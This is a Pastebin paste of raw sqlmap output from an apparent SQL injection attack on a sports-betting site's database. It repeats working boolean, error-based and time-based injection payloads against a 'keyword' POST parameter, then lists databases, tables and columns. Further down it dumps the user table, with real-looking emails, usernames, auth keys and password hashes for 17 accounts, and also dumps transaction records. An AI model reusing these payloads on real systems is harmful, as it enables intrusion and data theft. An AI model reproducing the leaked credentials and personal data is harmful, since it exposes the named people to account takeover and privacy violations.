Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- sqlmap identified the following injection points with a total of 58 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(10) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(10) AND '%'='
- ---
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- available databases [5]:
- [*] biko_sport
- [*] information_schema
- [*] mysql
- [*] performance_schema
- [*] sys
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: biko_sport
- [151 tables]
- +--------------------------+
- | SEQUENCE |
- | match |
- | transaction |
- | user |
- | account_freeze |
- | airtel_money |
- | airtel_money_rate |
- | airtel_subs_blast |
- | arch_live_match |
- | auth_assignment |
- | auth_item |
- | auth_item_child |
- | auth_rule |
- | backup_profile |
- | bb |
- | bet |
- | bet_discount |
- | bet_slip |
- | bet_slip_check |
- | bet_slip_temp |
- | bet_status_changes |
- | biko_point |
- | biko_point_bet |
- | biko_point_summary |
- | biko_point_trx |
- | biko_profile_names |
- | bleague_competition |
- | bleague_event_odd |
- | bleague_match |
- | bonus_bet |
- | bonus_bet_count |
- | bonus_trx |
- | card_summary |
- | category |
- | competition |
- | delivery_report |
- | early_bet_white_list |
- | event |
- | event_odd |
- | free_bet |
- | free_bet_transactions |
- | ga |
- | game |
- | game_ids |
- | game_request |
- | gr_profile_player |
- | gr_tickets |
- | inactive2_subs |
- | inactive_nums |
- | inactive_profile |
- | inbox |
- | jackpot_bet |
- | jackpot_event |
- | jackpot_match |
- | jackpot_trx |
- | jackpot_type |
- | jackpot_winner |
- | jp_bet_cancel_data |
- | jpbonus_award |
- | latest_alive |
- | live_match |
- | live_meta_history |
- | live_odds |
- | live_odds_change |
- | live_odds_meta |
- | ls_betmatch |
- | ls_card |
- | ls_category |
- | ls_city |
- | ls_country |
- | ls_goal |
- | ls_line_up |
- | ls_livescore_data |
- | ls_match_detail |
- | ls_player |
- | ls_referee |
- | ls_scores |
- | ls_sport |
- | ls_substitution |
- | ls_team |
- | ls_tournament |
- | ls_venue |
- | matchid |
- | menu |
- | migration |
- | missed_withdrawals |
- | mobile_app_profile |
- | mobile_app_version |
- | mpesa_rate |
- | mpesa_transaction |
- | msi |
- | mts_exception |
- | mts_ticket_submit |
- | mts_validation_code |
- | network_charge_range |
- | nums_pro |
- | odd_history |
- | odd_key_alias |
- | odd_type |
- | odds_history |
- | odds_subtype |
- | outbox |
- | outcome |
- | outcome_backup |
- | outcome_o |
- | outcome_old |
- | outcome_test |
- | outright |
- | outright_competitor |
- | outright_odd |
- | outright_odd_history |
- | outright_outcome |
- | paybill_tariff |
- | playground |
- | profile |
- | profile_balance |
- | profile_bonus |
- | profile_setting |
- | profile_settings |
- | recon_references |
- | reconciliation |
- | running_balance |
- | seven_aggregator_request |
- | shop_deposits |
- | shop_withdrawals |
- | speed_dial_history |
- | speed_dial_profile |
- | sport |
- | sqlmapfile |
- | talksport |
- | team |
- | ticket_settlement |
- | tournament |
- | traffic_analytic |
- | types |
- | user_bet_cancel |
- | ux_categories |
- | ux_todays_highlights |
- | virtual_competition |
- | virtual_event_odd |
- | virtual_latest_alive |
- | virtual_match |
- | virtual_odd_type |
- | virtual_odds |
- | virtual_odds_meta |
- | virtual_outcome |
- | virtual_sport |
- | void_bet_slip |
- | winner |
- | withdraw_references |
- | withdrawal |
- +--------------------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: biko_sport
- Table: user
- [9 columns]
- +----------------------+-------------+
- | Column | Type |
- +----------------------+-------------+
- | auth_key | text |
- | created_at | text |
- | email | text |
- | id | bigint(20) |
- | password_hash | text |
- | password_reset_token | text |
- | status | varchar(5) |
- | updated_at | text |
- | username | varchar(20) |
- +----------------------+-------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: biko_sport
- Table: user
- [17 entries]
- +----+---------------------------+--------+------------+----------------------------------+---------------------+---------------------+--------------------------------------------------------------+----------------------+
- | id | email | status | username | auth_key | created_at | updated_at | password_hash | password_reset_token |
- +----+---------------------------+--------+------------+----------------------------------+---------------------+---------------------+--------------------------------------------------------------+----------------------+
- | 2 | peter.murwa@gmail.com | 10 | murwa | Q1WUztFcBu4C6yBPak1qpv336aXCPXpE | 1517084792 | 1517084792 | $2y$13$wTNGu/E0Rr4sxdXi4E75E.T7c0SIEtj6OAqVsl5hT5kQrYbUejcD. | NULL |
- | 3 | goodhopeh@mobibet.co.tz | 10 | goodhope | 6jus-DVtSsP5jUUaU9T4jESQRddPq805 | 1517228527 | 1517228527 | $2y$13$K2B5BB9lji/TwpBnf5Bu4ea/EKefdMLA5Pfnxd0fzLzKyb3f13hBC | NULL |
- | 4 | victori@mobibet.co.tz | 10 | Victor | ZCY0Qo7QRWu-FnMAhC8mXHwCJ9S1s73x | 1517314649 | 1517314649 | $2y$13$mTJz8q5uRNnZNd.cOUawPeFDcC/ho1kS7s94XpMUHIGh1X94KBWZy | NULL |
- | 5 | cmgeta@mobibet.co.tz | 10 | Charles | y77Aal55cfYgqiztF_A8yITQMSFzvGpF | 1517323928 | 1517323928 | $2y$13$Czv4bDRJDei.5MhPTCoesOwurEODeeSJbVIvWrRSSTfRBs8Mf4xDa | NULL |
- | 6 | geoffrey@mobibet.co.tz | 10 | geoffrey | iLj5z8DLq0o7DSVNK5KTiTXVLlO-zdLw | 1517409882 | 1517409882 | $2y$13$5zMJZayVbPqrQYwKX9lSs.nMiUtvgTn2OaVaSQAwr9tXeadO0ADEa | NULL |
- | 10 | rubewafula@gmail.com | 10 | rubewafula | cyR9-jNzFAAlIYu-708Lm6y5ouuUm3tK | 2018-01-26 12:28:36 | 2018-01-26 12:28:36 | $2a$08$R71tyVKLyPrfZuWFYYKlk.Ix0cEq/xW7XFxLvMZ7VQr7iK9BBmVBO | NULL |
- | 11 | mwendamseke@ewallet.co.tz | 10 | 0713076547 | RN2l9xGq4O_5X26QjaB8MrH-esA9YfH1 | 1517677955 | 1517677955 | $2y$13$ixnAn4AB8s/XSt6rPOmD6.1UXIr7HCvjjb7PeBHU.mvJMyPjLSz0i | NULL |
- | 12 | jmbaga@bikosports.co.tz | 10 | jmbaga | JX7a8CWVeLlfgq0NOUDr9QuxfTbVAtic | 1518081252 | 1518081252 | $2y$13$ZH5363BzdH/Rg4lPbyEvzuE2ZAefYlcAbkYfifFD.rnSxi5PnuqgK | NULL |
- | 13 | peter.murwa87@gmail.com | 10 | peter | JqDK5892G1mI7n6M7zNLOApTpE1YsDip | 1518099120 | 1518099120 | $2y$13$oahXpBjBbPKZGqRWtFdNcuVWmyl9xEQx0UyJk3tG8fN/RyQC2FinC | NULL |
- | 14 | cc1@bikosports.co.tz | 10 | cc1 | bhe4mtdPvb4zTN55dbrjIFkea8smf3-K | 1518100867 | 1518100867 | $2y$13$1pVlA3z4IcuLT0WZ0lKChOlnO4CnWSw1JkxF9il7HYPjCAxeOZbdW | NULL |
- | 15 | achley@bikosports.co.tz | 10 | achley | GjVfsGXmIKGDgUo4Hrv5rpIN1t1CzYro | 1518101951 | 1518101951 | $2y$13$WZhCjLqVYSXDCNv/kPK.POzuvJ14nwahwf6a3yrp13N8awmIAxBHe | NULL |
- | 16 | mathias@bikosports.co.tz | 10 | mathias | 8i3kr6BIHXmMG-NvRhrwUAuFF3u_4BSx | 1518102110 | 1518102110 | $2y$13$8Ayw7yxnTW7oAFAgW9CHfujhrce7eeG3SEBBxAVkaRMVbXS1Qqz/q | NULL |
- | 17 | mercy@bikosports.co.tz | 10 | mercy | 2_sFyPNsPu56Jok1-eWcek_sA9fkGhXv | 1518102186 | 1518102186 | $2y$13$LAjDQPZewSi07Pmu0/Mq9uwqxjTqaBSWTUyQ4iFreaQU48gG8mdJ6 | NULL |
- | 18 | sachko@bikosports.co.tz | 10 | sachko | N1cD-cKN71AMMtSZDgF9dxy9qkIrs53I | 1518164536 | 1518164536 | $2y$13$D9kEdiOML6O7835O.GlZyeKCDDTO5f9KDwIiMW6dqpegH7pWmGb0C | NULL |
- | 19 | anicet@bikosports.co.tz | 10 | anicet | 5GGamhS1AxmwNHeKRcfVkJzYRxyECZ5y | 1518164699 | 1518164699 | $2y$13$XpKE7/rxCvDo8vbbCRrEVOqH82cjWYe6qPh6attlwvV9AKoy3.9Ha | NULL |
- | 20 | rose4@bikosports.co.tz | 10 | rose4 | F8lzsndqNlbZH9-MyaUjPmI5BbLtiyM8 | 1518164753 | 1518164753 | $2y$13$NhgvuQp.XLHZWfR0hnCfiOYhf68x9gH4kIh/rbGl1lY3qrfgWPH/O | NULL |
- | 21 | jngowi26@gmail.com | 10 | joseph | XCK1C7pnACgdLJ-loedJpYf_kjRbKkUi | 1518191463 | 1518191463 | $2y$13$hdvvYQTg.9cxJHR4ZpJGn.x02iYiNqmcX312BM3QsxAhLrHVzk36u | NULL |
- +----+---------------------------+--------+------------+----------------------------------+---------------------+---------------------+--------------------------------------------------------------+----------------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: biko_sport
- Table: user_bet_cancel
- [6 columns]
- +------------+--------------+
- | Column | Type |
- +------------+--------------+
- | bet_id | int(11) |
- | created | datetime |
- | created_by | varchar(255) |
- | id | int(11) |
- | modified | timestamp |
- | status | int(11) |
- +------------+--------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: biko_sport
- Table: user_bet_cancel
- [0 entries]
- +----+--------+--------+---------+----------+------------+
- | id | bet_id | status | created | modified | created_by |
- +----+--------+--------+---------+----------+------------+
- +----+--------+--------+---------+----------+------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: biko_sport
- Table: transaction
- [11 columns]
- +-----------------+----------------------------+
- | Column | Type |
- +-----------------+----------------------------+
- | account | varchar(50) |
- | amount | decimal(10,0) |
- | created | datetime |
- | created_by | varchar(60) |
- | id | int(11) |
- | iscredit | smallint(1) |
- | modified | timestamp |
- | profile_id | bigint(20) |
- | reference | varchar(50) |
- | running_balance | decimal(10,2) |
- | status | enum('COMPLETE','PENDING') |
- +-----------------+----------------------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: biko_sport
- Table: transaction
- [11 entries]
- +------+------------+----------+--------+----------------+---------------------+----------+---------------------+-----------+------------------+-----------------+
- | id | profile_id | status | amount | account | created | iscredit | modified | reference | created_by | running_balance |
- +------+------------+----------+--------+----------------+---------------------+----------+---------------------+-----------+------------------+-----------------+
- | 2793 | 1 | COMPLETE | 1000 | 2265_VIRTUAL | 2018-02-02 19:12:05 | 0 | 2018-02-02 19:12:05 | 1000 | Biko_Q_Processor | NULL |
- | 2797 | 1 | COMPLETE | 1000 | [8886]_VIRTUAL | 2018-02-02 19:12:06 | 0 | 2018-02-02 19:12:06 | 10000 | Biko_Q_Processor | NULL |
- | 2800 | 1 | COMPLETE | 1000 | 720_VIRTUAL | 2018-02-02 19:12:08 | 0 | 2018-02-02 19:12:08 | 10001 | Biko_Q_Processor | NULL |
- | 4847 | 4 | COMPLETE | 500 | [8887]_VIRTUAL | 2018-02-02 19:12:08 | 0 | 2018-02-02 19:12:08 | 10002 | Biko_Q_Processor | NULL |
- | 382 | 6 | COMPLETE | 500 | [8888]_VIRTUAL | 2018-02-02 19:12:09 | 0 | 2018-02-02 19:12:09 | 10003 | Biko_Q_Processor | NULL |
- | 383 | 6 | COMPLETE | 1000 | 631_VIRTUAL | 2018-02-02 19:12:10 | 0 | 2018-02-02 19:12:10 | 10004 | Biko_Q_Processor | NULL |
- | 384 | 6 | COMPLETE | 800 | 2009_VIRTUAL | 2018-02-02 19:12:10 | 0 | 2018-02-02 19:12:10 | 10005 | Biko_Q_Processor | NULL |
- | 385 | 6 | COMPLETE | 1000 | [8889]_VIRTUAL | 2018-02-02 19:12:11 | 0 | 2018-02-02 19:12:11 | 10007 | Biko_Q_Processor | NULL |
- | 1694 | 6 | COMPLETE | 5000 | 937_VIRTUAL | 2018-02-02 19:32:50 | 0 | 2018-02-02 19:32:50 | 10008 | Biko_Q_Processor | NULL |
- | 1920 | 6 | COMPLETE | 500 | 2439_VIRTUAL | 2018-02-02 20:13:00 | 0 | 2018-02-02 20:13:00 | 10009 | Biko_Q_Processor | NULL |
- | 1935 | 6 | COMPLETE | 500 | 4257_VIRTUAL | 2018-02-02 20:28:05 | 0 | 2018-02-02 20:28:05 | 1001 | Biko_Q_Processor | NULL |
- +------+------------+----------+--------+----------------+---------------------+----------+---------------------+-----------+------------------+-----------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: biko_sport
- [151 tables]
- +--------------------------+
- | SEQUENCE |
- | match |
- | transaction |
- | user |
- | account_freeze |
- | airtel_money |
- | airtel_money_rate |
- | airtel_subs_blast |
- | arch_live_match |
- | auth_assignment |
- | auth_item |
- | auth_item_child |
- | auth_rule |
- | backup_profile |
- | bb |
- | bet |
- | bet_discount |
- | bet_slip |
- | bet_slip_check |
- | bet_slip_temp |
- | bet_status_changes |
- | biko_point |
- | biko_point_bet |
- | biko_point_summary |
- | biko_point_trx |
- | biko_profile_names |
- | bleague_competition |
- | bleague_event_odd |
- | bleague_match |
- | bonus_bet |
- | bonus_bet_count |
- | bonus_trx |
- | card_summary |
- | category |
- | competition |
- | delivery_report |
- | early_bet_white_list |
- | event |
- | event_odd |
- | free_bet |
- | free_bet_transactions |
- | ga |
- | game |
- | game_ids |
- | game_request |
- | gr_profile_player |
- | gr_tickets |
- | inactive2_subs |
- | inactive_nums |
- | inactive_profile |
- | inbox |
- | jackpot_bet |
- | jackpot_event |
- | jackpot_match |
- | jackpot_trx |
- | jackpot_type |
- | jackpot_winner |
- | jp_bet_cancel_data |
- | jpbonus_award |
- | latest_alive |
- | live_match |
- | live_meta_history |
- | live_odds |
- | live_odds_change |
- | live_odds_meta |
- | ls_betmatch |
- | ls_card |
- | ls_category |
- | ls_city |
- | ls_country |
- | ls_goal |
- | ls_line_up |
- | ls_livescore_data |
- | ls_match_detail |
- | ls_player |
- | ls_referee |
- | ls_scores |
- | ls_sport |
- | ls_substitution |
- | ls_team |
- | ls_tournament |
- | ls_venue |
- | matchid |
- | menu |
- | migration |
- | missed_withdrawals |
- | mobile_app_profile |
- | mobile_app_version |
- | mpesa_rate |
- | mpesa_transaction |
- | msi |
- | mts_exception |
- | mts_ticket_submit |
- | mts_validation_code |
- | network_charge_range |
- | nums_pro |
- | odd_history |
- | odd_key_alias |
- | odd_type |
- | odds_history |
- | odds_subtype |
- | outbox |
- | outcome |
- | outcome_backup |
- | outcome_o |
- | outcome_old |
- | outcome_test |
- | outright |
- | outright_competitor |
- | outright_odd |
- | outright_odd_history |
- | outright_outcome |
- | paybill_tariff |
- | playground |
- | profile |
- | profile_balance |
- | profile_bonus |
- | profile_setting |
- | profile_settings |
- | recon_references |
- | reconciliation |
- | running_balance |
- | seven_aggregator_request |
- | shop_deposits |
- | shop_withdrawals |
- | speed_dial_history |
- | speed_dial_profile |
- | sport |
- | sqlmapfile |
- | talksport |
- | team |
- | ticket_settlement |
- | tournament |
- | traffic_analytic |
- | types |
- | user_bet_cancel |
- | ux_categories |
- | ux_todays_highlights |
- | virtual_competition |
- | virtual_event_odd |
- | virtual_latest_alive |
- | virtual_match |
- | virtual_odd_type |
- | virtual_odds |
- | virtual_odds_meta |
- | virtual_outcome |
- | virtual_sport |
- | void_bet_slip |
- | winner |
- | withdraw_references |
- | withdrawal |
- +--------------------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: biko_sport
- Table: profile
- [7 columns]
- +------------+-------------+
- | Column | Type |
- +------------+-------------+
- | created | datetime |
- | created_by | varchar(45) |
- | modified | timestamp |
- | msisdn | varchar(45) |
- | network | varchar(50) |
- | profile_id | bigint(20) |
- | status | smallint(1) |
- +------------+-------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: biko_sport
- Table: profile_balance
- [7 columns]
- +--------------------+---------------+
- | Column | Type |
- +--------------------+---------------+
- | balance | decimal(10,2) |
- | bonus_balance | decimal(10,2) |
- | created | datetime |
- | modified | timestamp |
- | profile_balance_id | int(10) |
- | profile_id | bigint(20) |
- | transaction_id | bigint(20) |
- +--------------------+---------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- available databases [5]:
- [*] biko_sport
- [*] information_schema
- [*] mysql
- [*] performance_schema
- [*] sys
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: sys
- [101 tables]
- +-----------------------------------------------+
- | session |
- | version |
- | host_summary |
- | host_summary_by_file_io |
- | host_summary_by_file_io_type |
- | host_summary_by_stages |
- | host_summary_by_statement_latency |
- | host_summary_by_statement_type |
- | innodb_buffer_stats_by_schema |
- | innodb_buffer_stats_by_table |
- | innodb_lock_waits |
- | io_by_thread_by_latency |
- | io_global_by_file_by_bytes |
- | io_global_by_file_by_latency |
- | io_global_by_wait_by_bytes |
- | io_global_by_wait_by_latency |
- | latest_file_io |
- | memory_by_host_by_current_bytes |
- | memory_by_thread_by_current_bytes |
- | memory_by_user_by_current_bytes |
- | memory_global_by_current_bytes |
- | memory_global_total |
- | metrics |
- | processlist |
- | ps_check_lost_instrumentation |
- | schema_auto_increment_columns |
- | schema_index_statistics |
- | schema_object_overview |
- | schema_redundant_indexes |
- | schema_table_lock_waits |
- | schema_table_statistics |
- | schema_table_statistics_with_buffer |
- | schema_tables_with_full_table_scans |
- | schema_unused_indexes |
- | session_ssl_status |
- | statement_analysis |
- | statements_with_errors_or_warnings |
- | statements_with_full_table_scans |
- | statements_with_runtimes_in_95th_percentile |
- | statements_with_sorting |
- | statements_with_temp_tables |
- | sys_config |
- | user_summary |
- | user_summary_by_file_io |
- | user_summary_by_file_io_type |
- | user_summary_by_stages |
- | user_summary_by_statement_latency |
- | user_summary_by_statement_type |
